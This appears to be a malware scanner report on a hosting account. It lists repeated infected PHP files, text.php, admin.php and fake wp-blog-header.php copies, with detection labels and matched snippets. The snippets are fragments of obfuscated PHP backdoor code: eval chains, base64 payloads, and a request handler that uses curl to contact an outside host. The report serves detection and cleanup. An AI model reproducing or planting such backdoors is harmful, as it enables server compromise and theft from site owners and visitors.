Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/turtlesys.net/support-user/.Archive/text.php

Size: 1.49 kB Created: 2023-10-15 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/turtlesys.net/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/shawndees.com/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/mail/text.php

Size: 1.49 kB Created: 2023-10-16 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/mail/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/perl5/bin/input.php

Size: 1.49 kB Created: 2023-02-21 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/perl5/bin/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/perl5/lib/perl5/admin.php

Size: 1.49 kB Created: 2023-08-05 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/perl5/lib/perl5/index.php

Size: 1.49 kB Created: 2023-05-02 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/perl5/lib/input.php

Size: 1.49 kB Created: 2023-09-20 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/perl5/lib/admin.php

Size: 1.49 kB Created: 2023-11-11 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/perl5/lib/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/perl5/text.php

Size: 1.49 kB Created: 2023-10-10 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	`<?php "urpbSNw+e56YsnyYZzqSprR9KFqBstVNZc5X+IG+loQ8bvl7ac/18c/4eew6leuX6RLLhLlDdB6rcd8/qnz8jTTZHltqJOZsHkmJbi2wKxJtLXkqxGlpNqNNclqTYx2sNVTa1OVH8vdlG7CrEpINrSyFXAodqaR0I29zf6iWfrUU/N+kBrSqDzlqnECHQISHLN6ExmlTQG4iwQeMy1ZFktIWqsdIzgnBcMFpnacCUm7AzmwKOjAMn4D59vEv3NF9t6ossRPtu24RWpcw7H7JbZQORZrv8JomlNDpDolYYfR9R/JAaQmMrDz0tA5IMdX7bcguhFLfNnVJw8eeEQrw85Oomk5L8mu+ARSw99IAtCj/AkikZDcGy8BdQY6YNtTnVKbSzE+tKJ3i0o3hd2bndmJn+K6aHsn/18CBSB6xoWu4a0mNRvEUBbfxoWN0EaFNDJxFQsZF8DBUC622QVFn45/nBAWA"`
Exploit escaped_path Line: 5 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x75c\x79U\x79OSU\x79OSU\x79OSU\x79OSU\x79OSU\x7aQ`
Function eval Line: 7 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval($co($ro($na($AmInE))))`
Sign 34b7e999 Dangerous Malware Signature (hash: 34b7e999)	`<?php d6aW5mbGF0Z`
Sign 7f5d33bf Dangerous Malware Signature (hash: 7f5d33bf)	`<?php Jhc2U2N`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php ZXZhb`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/perl5/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/public_ftp/incoming/wp-blog-header.php

Size: 2.74 kB Created: 2024-06-01 06:19:42 Modified: 2024-06-01 06:19:42 Warns: 1 Dangers: 2

Description Match

Exploit hex_char Line: 2 Dangerous

Hex char is usually used for the obfuscation of malicious code

<?php \x5f

Function eval Dangerous

Encoded Function `eval`

<?php eval("\77>" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["doact"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["doact"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "http\72/\57hknxoe\56byhot.top/index.php"; goto W3zBw; TQ2d2: $cRR8Z = c...

Function eval Line: 2 Warning

Potentially dangerous function `eval`

<?php eval("\77\x3e" . $WXUOL); goto agBgo; p2yqc: if (!empty($P_83N)) { goto Ph4IZ; } goto niHxL; VlsYk: $P_83N = $_REQUEST["\x64\157\141\143\x74"]; goto p2yqc; Kf9mk: RAjJ3: goto MKXm1; rF07B: $_SESSION["\144\x6f\x61\143\164"] = $P_83N; goto Kf9mk; rfzDY: function INqr_($BdvsM) { goto WgRJ1; W3zBw: $gL1uI = curl_init($AzBk2); goto TLGQX; wdMLY: curl_setopt($gL1uI, CURLOPT_RETURNTRANSFER, true); goto TQ2d2; WdQlF: curl_close($gL1uI); goto dVbs5; WgRJ1: $AzBk2 = "\150\164\x74\x70\72\x2f\57\150\x6b\x6e...

/custdata02/turtle/public_ftp/text.php

Size: 1.49 kB Created: 2023-09-11 04:18:11 Modified: 2024-06-01 04:18:11 Warns: 2 Dangers: 5

Description	Match
